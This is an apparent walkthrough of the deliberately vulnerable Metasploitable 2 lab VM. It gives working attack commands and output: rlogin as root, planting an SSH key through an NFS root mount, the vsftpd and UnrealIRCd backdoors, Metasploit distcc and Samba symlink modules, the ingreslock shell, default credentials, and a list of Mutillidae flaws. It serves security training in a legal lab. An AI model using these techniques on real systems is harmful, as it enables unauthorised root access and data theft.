Not shown: 65506 closed ports

PORT STATE SERVICE

21/tcp open ftp

22/tcp open ssh

23/tcp open telnet

25/tcp open smtp

53/tcp open domain

80/tcp open http

111/tcp open rpcbind

139/tcp open netbios-ssn

445/tcp open microsoft-ds

512/tcp open exec

513/tcp open login

514/tcp open shell

1099/tcp open rmiregistry

1524/tcp open ingreslock

2049/tcp open nfs

2121/tcp open ccproxy-ftp

3306/tcp open mysql

3632/tcp open distccd

5432/tcp open postgresql

5900/tcp open vnc

6000/tcp open X11

6667/tcp open irc

6697/tcp open unknown

8009/tcp open ajp13

8180/tcp open unknown

8787/tcp open unknown

39292/tcp open unknown

43729/tcp open unknown

44813/tcp open unknown

55852/tcp open unknown

MAC Address: 00:0C:29:9A:52:C1 (VMware)

Nearly every one of these listening services provides a remote entry point into the system. In the next section, we will walk through some of these vectors.

Services: Unix Basics

TCP ports 512, 513, and 514 are known as “r” services, and have been misconfigured to allow remote access from any host (a standard “.rhosts + +” situation). To take advantage of this, make sure the “rsh-client” client is installed (on Ubuntu), and run the following command as your local root user. If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH.

# rlogin -l root 192.168.99.131

Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

root@metasploitable:~#

This is about as easy as it gets. The next service we should look at is the Network File System (NFS). NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services. The example below using rpcinfo to identify NFS and showmount -e to determine that the “/” share (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu packages to follow along.

root@ubuntu:~# rpcinfo -p 192.168.99.131

program vers proto port service

100000 2 tcp 111 portmapper

100000 2 udp 111 portmapper

100024 1 udp 53318 status

100024 1 tcp 43729 status

100003 2 udp 2049 nfs

100003 3 udp 2049 nfs

100003 4 udp 2049 nfs

100021 1 udp 46696 nlockmgr

100021 3 udp 46696 nlockmgr

100021 4 udp 46696 nlockmgr

100003 2 tcp 2049 nfs

100003 3 tcp 2049 nfs

100003 4 tcp 2049 nfs

100021 1 tcp 55852 nlockmgr

100021 3 tcp 55852 nlockmgr

100021 4 tcp 55852 nlockmgr

100005 1 udp 34887 mountd

100005 1 tcp 39292 mountd

100005 2 udp 34887 mountd

100005 2 tcp 39292 mountd

100005 3 udp 34887 mountd

100005 3 tcp 39292 mountd

root@ubuntu:~# showmount -e 192.168.99.131

Export list for 192.168.99.131:

/ *

Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account’s authorized_keys file:

root@ubuntu:~# ssh-keygen

Generating public/private rsa key pair.

Enter file in which to save the key (/root/.ssh/id_rsa):

Enter passphrase (empty for no passphrase):

Enter same passphrase again:

Your identification has been saved in /root/.ssh/id_rsa.

Your public key has been saved in /root/.ssh/id_rsa.pub.

root@ubuntu:~# mkdir /tmp/r00t

root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/

root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys

root@ubuntu:~# umount /tmp/r00t

root@ubuntu:~# ssh root@192.168.99.131

Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

root@metasploitable:~#

Services: Backdoors

On port 21, Metasploitable2 runs vsftpd, a popular FTP server. This particular version contains a backdoor that was slipped into the source code by an unknown intruder. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence “:)” [ a happy face ], the backdoored version will open a listening shell on port 6200. We can demonstrate this with telnet or use the Metasploit Framework module to automatically exploit it:

root@ubuntu:~# telnet 192.168.99.131 21

Trying 192.168.99.131…

Connected to 192.168.99.131.

Escape character is ‘^]’.

220 (vsFTPd 2.3.4)

user backdoored:)

331 Please specify the password.

pass invalid

^]

telnet> quit

Connection closed.

root@ubuntu:~# telnet 192.168.99.131 6200

Trying 192.168.99.131…

Connected to 192.168.99.131.

Escape character is ‘^]’.

id;

uid=0(root) gid=0(root)

On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor that went unnoticed for months – triggered by sending the letters “AB” following by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.

msfconsole

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131

msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler

[*] Connected to 192.168.99.131:6667…

:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…

:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead

[*] Sending backdoor command…

[*] Accepted the first client connection…

[*] Accepted the second client connection…

[*] Command: echo 8bMUYsfmGvOLHBxe;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets…

[*] Reading from socket B

[*] B: “8bMUYsfmGvOLHBxe\r\n”

[*] Matching…

[*] A is input…

[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700

id

uid=0(root) gid=0(root)

Much less subtle is the old standby “ingreslock” backdoor that is listening on port 1524. The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Accessing it is easy:

root@ubuntu:~# telnet 192.168.99.131 1524

Trying 192.168.99.131…

Connected to 192.168.99.131.

Escape character is ‘^]’.

root@metasploitable:/# id

uid=0(root) gid=0(root) groups=0(root)

Services:Unintentional Backdoors

In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. The first of which installed on Metasploitable2 is distccd. This program makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below.

msfconsole

msf > use exploit/unix/misc/distcc_exec

msf exploit(distcc_exec) > set RHOST 192.168.99.131

msf exploit(distcc_exec) > exploit

[*] Started reverse double handler

[*] Accepted the first client connection…

[*] Accepted the second client connection…

[*] Command: echo uk3UdiwLUq0LX3Bi;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets…

[*] Reading from socket B

[*] B: “uk3UdiwLUq0LX3Bi\r\n”

[*] Matching…

[*] A is input…

[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700

id

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Samba, when configured with a writeable file share and “wide links” enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.

root@ubuntu:~# smbclient -L //192.168.99.131

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Sharename Type Comment

——— —- ——-

print$ Disk Printer Drivers

tmp Disk oh noes!

opt Disk

IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))

ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))

root@ubuntu:~# msfconsole

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131

msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server…

[*] Trying to mount writeable share ‘tmp’…

[*] Trying to link ‘rootfs’ to the root filesystem…

[*] Now access the following share to browse the root filesystem:

[*] \\192.168.99.131\tmp\rootfs\

msf auxiliary(samba_symlink_traversal) > exit

root@ubuntu:~# smbclient //192.168.99.131/tmp

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

[..]

Weak Passwords

In additional to the more blatant backdoors and misconfigurations, Metasploit2 has terrible password security for both system and database server accounts. The primary administrative user msfadmin has a password matching the username. By discovering the list of users on this system, either by using another flaw to capture the passwd file, or by enumerating these user IDs via Samba, a brute force attack can be used to quickly access multiple user accounts. At a minimum, the following weak system accounts are configured on the system.

Account Name Password
msfadmin msfadmin
user user
postgres postgres
sys batman
klog 123456789
service service

In addition to these system-level accounts, the PostgreSQL service can be accessed with username postgres and password postgres, while the MySQL service is open to username root with an empty password. The VNC service provides remote desktop access using the password password.

Vulnerable Web Services

Metasploitable 2 has deliberately vulnerable web applications pre-installed. The web server starts automatically when Metasploitable 2 is booted. To access the web applications, open a web browser and enter the URL http:// where is the IP address of Metasploitable 2. One way to accomplish this is to install Metasploitable 2 as a guest operating system in Virtual Box and change the network interface settings from “NAT” to “Host Only”. (Note: A video tutorial on installing Metasploitable 2 is available at the link .)

In this example, Metasploitable 2 is running at IP 192.168.56.101. Browsing to http://192.168.56.101/ shows the web application home page.

metasploitable-web-home-page.png

Note: 192.168.56/24 is the default “host only” network in Virtual Box. IP address are assigned starting from “101”. Depending on the order in which guest operating systems are started, the IP address of Metasploitable 2 will vary.

To access a particular web application, click on one of the links provided. Individual web applications may additionally be accessed by appending the application directory name onto http:// to create URL http:////. For example, the Mutillidae application may be access (in this example) at address http://192.168.56.101/mutillidae/. The applications are installed in Metasploitable 2 in the /var/www directory. (Note: See a list with command “ls /var/www”.) In the current version as of this writing, the applications are

mutillidae (NOWASP Mutillidae 2.1.19)
dvwa (Damn Vulnerable Web Application)
phpMyAdmin
tikiwiki (TWiki)
tikiwiki-old
dav (WebDav)

Vulnerable Web Service: Mutillidae

The Mutillidae web application (NOWASP (Mutillidae)) contains all of the vulnerabilities from the OWASP Top Ten plus a number of other vulnerabilities such as HTML-5 web storage, forms caching, and click-jacking. Inspired by DVWA, Mutillidae allows the user to change the “Security Level” from 0 (completely insecure) to 5 (secure). Additionally three levels of hints are provided ranging from “Level 0 – I try harder” (no hints) to “Level 2 – noob” (Maximum hints). If the application is damaged by user injections and hacks, clicking the “Reset DB” button resets the application to its original state.

Note: Tutorials on using Mutillidae are available at the webpwnized YouTube Channel.

mutillidae-home-page.png

Enable hints in the application by click the “Toggle Hints” button on the menu bar:

mutillidae-tutorial.png

The Mutillidae application contains at least the following vulnerabilities on these respective pages:

Page Vulnerabilities
add-to-your-blog.php

SQL Injection on blog entry

SQL Injection on logged in user name

Cross site scripting on blog entry

Cross site scripting on logged in user name

Log injection on logged in user name

CSRF

JavaScript validation bypass

XSS in the form title via logged in username

The show-hints cookie can be changed by user to enable hints even though they are not suppose to show in secure mode
arbitrary-file-inclusion.php

System file compromise

Load any page from any site

browser-info.php

XSS via referer HTTP header

JS Injection via referer HTTP header

XSS via user-agent string HTTP header
capture-data.php
XSS via any GET, POST, or Cookie
captured-data.php XSS via any GET, POST, or Cookie
config.inc* Contains unencrytped database credentials
credits.php Unvalidated Redirects and Forwards
dns-lookup.php

Cross site scripting on the host/ip field

O/S Command injection on the host/ip field

This page writes to the log. SQLi and XSS on the log are possible

GET for POST is possible because only reading POSTed variables is not enforced.
footer.php* Cross site scripting via the HTTP_USER_AGENT HTTP header.
framing.php Click-jacking
header.php*

XSS via logged in user name and signature

The Setup/reset the DB menu item canbe enabled by setting the uid value of the cookie to 1
html5-storage.php DOM injection on the add-key error message because the key entered is output into the error message without being encoded
index.php*

You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value.

You can SQL injection the UID cookie value because it is used to do a lookup

You can change your rank to admin by altering the UID value

HTTP Response Splitting via the logged in user name because it is used to create an HTTP Header

This page is responsible for cache-control but fails to do so

This page allows the X-Powered-By HTTP header

HTML comments

There are secret pages that if browsed to will redirect user to the phpinfo.php page. This can be done via brute forcing
log-visit.php

SQL injection and XSS via referer HTTP header

SQL injection and XSS via user-agent string
login.php

Authentication bypass SQL injection via the username field and password field

SQL injection via the username field and password field

XSS via username field

JavaScript validation bypass
password-generator.php JavaScript injection
pen-test-tool-lookup.php JSON injection
phpinfo.php

This page gives away the PHP server configuration

Application path disclosure

Platform path disclosure
process-commands.php Creates cookies but does not make them HTML only
process-login-attempt.php Same as login.php. This is the action page.
redirectandlog.php Same as credits.php. This is the action page
register.php SQL injection and XSS via the username, signature and password field
rene-magritte.php Click-jacking
robots.txt Contains directories that are supposed to be private
secret-administrative-pages.php This page gives hints about how to discover the server configuration
set-background-color.php Cascading style sheet injection and XSS via the color field
show-log.php

Denial of Service if you fill up the log
XSS via the hostname, client IP, browser HTTP header, Referer HTTP header, and date fields
site-footer-xss-discusson.php XSS via the user agent string HTTP header
source-viewer.php Loading of any arbitrary file including operating system files.
text-file-viewer.php

Loading of any arbitrary web page on the Interet or locally including the sites password files.

Phishing
user-info.php

SQL injection to dump all usernames and passwords via the username field or the password field

XSS via any of the displayed fields. Inject the XSS on the register.php page.

XSS via the username field
user-poll.php

Parameter pollution

GET for POST

XSS via the choice parameter

Cross site request forgery to force user choice
view-someones-blog.php XSS via any of the displayed fields. They are input on the add to your blog page.

Vulnerable Web Services: DVWA

From the DVWA home page: “Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.”.

DVWA contains instructions on the home page and additional information is available at Wiki Pages – Damn Vulnerable Web App.

Default username = admin

Default password = password

dvwa.png

Vulnerable Web Services: Information Disclosure

Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php. In this example, the URL would be http://192.168.56.101/phpinfo.php. The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. For example, noting that the version of PHP disclosed in the screenshot is version 5.2.4, it may be possible that the system is vulnerable to CVE -CVE-2012-1823 and CVE -CVE-2012-2311 which affected PHP before 5.3.12 and 5.4.x before 5.4.2.

You can download Metasploitable 2 VM from here